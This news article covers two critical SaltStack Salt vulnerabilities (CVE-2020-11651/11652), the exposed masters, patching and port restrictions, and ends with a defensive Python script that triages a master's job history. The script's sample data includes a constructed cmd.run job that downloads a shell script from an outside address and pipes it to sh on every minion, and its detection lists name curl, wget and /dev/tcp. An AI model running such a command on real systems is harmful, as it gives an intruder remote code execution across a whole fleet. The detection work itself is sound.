Two critical vulnerabilities in SaltStack's open source Salt remote execution and configuration management framework let attackers bypass its authentication and authorisation checks and take over thousands of cloud-based servers if left unpatched.
Salt is used in infrastructure, network and security automation and is widely used to maintain datacentres and cloud environments. The framework comprises a master server acting as a central control point, which publishes commands to minion agents that carry out tasks and return data.
The two vulnerabilities, assigned CVE-2020-11651 (an authentication bypass) and CVE-2020-11652 (a directory traversal), were uncovered by F-Secure researchers in March 2020 while working on a client engagement.
They affect all versions of Salt up to and including 3000.1, and are considered so severe that F-Secure rated them 10 on the Common Vulnerability Scoring System (CVSS), the highest possible score.
Successfully exploited, they allow an attacker to execute code remotely as root on a Salt master and, through the master, on every minion it controls, meaning they could, for example, install backdoors, carry out ransomware attacks, or take over systems to mine cryptocurrencies. F-Secure said it had already found 6,000 such masters exposed on the public internet.
F-Secure principal consultant Olle Segerdahl said this made the vulnerabilities particularly dangerous, and urged Salt users to install the two fixed releases, versions 3000.2 and 2019.2.4, which SaltStack issued on 29 April 2020, ahead of the co-ordinated disclosure.
"Patch by Friday or compromised by Monday," said Segerdahl. "That's how I'd describe the dilemma facing admins who have their Salt master hosts exposed to the internet."
Segerdahl said the 6,000 exposed Salt masters he found during his research were of particular concern; Salt is popular in cloud environments such as Amazon Web Services (AWS) and Google Cloud Platform (GCP).
"I was expecting the number to be a lot lower. There are not many reasons to expose infrastructure management systems, which is what a lot of companies use Salt for, to the internet," he explained.
"When new vulnerabilities go public, attackers always race to exploit exposed, vulnerable hosts before admins patch or hide them. So if I were running one of these 6,000 masters, I wouldn't feel comfortable leaving work for the weekend knowing it's a target."
Although publicly accessible Salt masters are at the greatest risk, Segerdahl added that masters hidden from the internet could still be exploited easily by an attacker who has already gained a foothold on the organisation's network by some other means.
Organisations using Salt should update to a fixed release as soon as possible, using Salt's own package management where they already rely on it. Those with exposed Salt hosts should add network controls that restrict access to the master's ports (4505 and 4506 in the default configuration) to the addresses of known minions, or at the very least block those ports from the public internet; minions need to reach both ports, so the restriction should be by source address rather than a blanket block on the master. SaltStack's website carries further guidance on how to do this.
On the bright side, Segerdahl said, he had found no evidence or reports of the vulnerabilities being exploited in real-world attacks, although he cautioned that this would likely change in short order once the details were disclosed.
F-Secure pointed out that any reasonably competent attacker should be able to produce a 100% reliable exploit for the vulnerabilities within 24 hours of disclosure. For that reason the firm has not released proof-of-concept exploit code, since doing so would put Salt users who are slow to patch at further risk.
It is also possible for Salt users to detect attacks exploiting the vulnerabilities, said Segerdahl. Concerned organisations can, and perhaps should, search their master hosts for signs of intrusion: the Salt master keeps a record (its job cache) of the jobs it has published, which defenders can examine for commands nobody on the team issued.
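One way to do that triage, as an added example that is not F-Secure's or SaltStack's code: the script below assumes the JSON produced by `salt-run jobs.list_jobs --out=json` (a dict keyed by job ID, each entry carrying Function, Arguments, Target, Target-type, User and StartTime) and flags jobs that look like post-exploitation activity rather than routine administration. The embedded job list is constructed for illustration, as are the lists of high-risk functions, download markers and expected users, which an operator would tune to their own master.

```python
"""Triage a Salt master's job history for signs of a compromised master.

Added example, not code from F-Secure or SaltStack. Assumes the JSON shape
of `salt-run jobs.list_jobs --out=json`; the sample data below is constructed.
"""
from __future__ import annotations

import json
import sys
from datetime import datetime

# Execution functions an intruder holding the master's root key would use
# to run commands or drop files on minions (assumption: tune per site).
HIGH_RISK_FUNCTIONS = {
    "cmd.run", "cmd.run_all", "cmd.script", "cmd.exec_code",
    "file.write", "file.managed", "cp.push", "state.single",
}

# Substrings in job arguments that fetch and execute remote content.
DOWNLOAD_MARKERS = ("curl ", "wget ", "|sh", "| sh", "base64 -d", "/dev/tcp/")

# Accounts expected to publish jobs on this master (assumption: tune per site).
EXPECTED_USERS = {"root", "sudo_ops"}

# Constructed sample in the shape of `salt-run jobs.list_jobs --out=json`.
SAMPLE_JOBS = json.loads(r'''{
  "20200430091502112345": {"Function": "test.ping", "Arguments": [],
    "Target": "*", "Target-type": "glob", "User": "root",
    "StartTime": "2020, Apr 30 09:15:02.112345"},
  "20200430234417998877": {"Function": "cmd.run",
    "Arguments": ["(curl -s http://198.51.100.23/sa.sh||wget -q -O- http://198.51.100.23/sa.sh)|sh"],
    "Target": "*", "Target-type": "glob", "User": "root",
    "StartTime": "2020, Apr 30 23:44:17.998877"},
  "20200501001203445566": {"Function": "state.apply", "Arguments": ["webserver"],
    "Target": "web*", "Target-type": "glob", "User": "sudo_ops",
    "StartTime": "2020, May 01 00:12:03.445566"},
  "20200501081500000000": {"Function": "grains.items", "Arguments": [],
    "Target": "db*", "Target-type": "glob", "User": "jenkins",
    "StartTime": "2020, May 01 08:15:00.000000"}
}''')


def parse_start_time(value: str) -> datetime:
    """Parse Salt's StartTime rendering, e.g. '2020, Apr 30 23:44:17.998877'."""
    return datetime.strptime(value, "%Y, %b %d %H:%M:%S.%f")


def triage_jobs(jobs: dict) -> list[dict]:
    """Return one finding per job that matches any suspicious pattern.

    Note that an attacker who has stolen the master's root key publishes
    as 'root', so the user check alone is not enough; the function/target
    and argument checks are what catch the typical mass 'cmd.run' payload.
    """
    findings = []
    for jid, job in sorted(jobs.items()):
        func = job.get("Function", "")
        user = job.get("User", "")
        args = " ".join(str(a) for a in job.get("Arguments", []))
        reasons = []
        if func in HIGH_RISK_FUNCTIONS and job.get("Target") == "*":
            reasons.append(f"{func} published to every minion")
        if any(marker in args for marker in DOWNLOAD_MARKERS):
            reasons.append("argument fetches and executes remote content")
        if user not in EXPECTED_USERS:
            reasons.append(f"unexpected publishing user {user!r}")
        if reasons:
            findings.append({
                "jid": jid,
                "started": parse_start_time(job["StartTime"]),
                "function": func,
                "user": user,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    # Usage: salt-run jobs.list_jobs --out=json > jobs.json; python triage.py jobs.json
    jobs = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_JOBS
    for f in triage_jobs(jobs):
        print(f"{f['jid']} {f['started']:%Y-%m-%d %H:%M} {f['function']} by {f['user']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

The script is a starting point for a hunt, not proof of compromise: a flagged job still needs to be matched against change records, and a clean job list proves little, since an attacker with root on the master can also clear the job cache.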
Further details on the vulnerabilities can be found in F-Secure Labs' advisory.